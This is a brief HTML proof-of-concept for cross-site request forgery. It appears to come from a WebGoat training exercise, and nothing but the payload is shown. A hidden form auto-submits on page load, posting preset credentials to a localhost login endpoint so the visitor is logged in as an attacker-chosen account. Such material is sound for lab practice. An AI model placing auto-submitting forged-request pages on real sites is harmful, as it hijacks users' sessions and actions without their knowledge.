<FORM NAME="poc" ENCTYPE="application/x-www-form-urlencoded"
action="http://127.0.0.1:8000/WebGoat/login" METHOD="POST">
<input type="hidden" name='username' value="csrf-username">
<input type="hidden" name='password' value="password">
</FORM>
<script>document.poc.submit();</script>
